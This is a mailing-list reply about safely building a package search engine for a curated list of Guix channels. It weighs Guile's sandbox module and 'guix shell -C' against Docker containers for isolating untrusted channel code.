[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: A package search engine for a curated list of channels

From: Ricardo Wurmus
Subject: Re: A package search engine for a curated list of channels
Date: Thu, 05 May 2022 11:01:37 +0200
User-agent: mu4e 1.6.10; emacs 28.0.50

Mekeor Melire <> writes:

> An alternative would be to implement some kind of isolation. But
> channels and package declarations are just scheme/guile code, so they
> will probably always be able to run arbitrary commands on the server.

Guile has some sandboxing features.  It would be an option to evaluate
channel modules in a restricted environment with (ice-9 sandbox).  That
would benefit all of Guix.

> Another approach would be isolation. For each channel, we could run
> hpcguix-web inside a Docker-container so that there's some isolation.
> Then, we'd need to run another web-service which "bundles" the
> packages.json files of all single-channel, dockerized hpcguix-web
> instances. But:
>     (1.) Does Docker really offer sufficient isolation?

No more than “guix shell -C”.  There’s no good reason to use Docker when
you already have Guix.  The Docker service exists for when you have a
Docker container image that you must use, not because its
containerization is superior to “guix shell -C”.


reply via email to

[Prev in Thread] Current Thread [Next in Thread]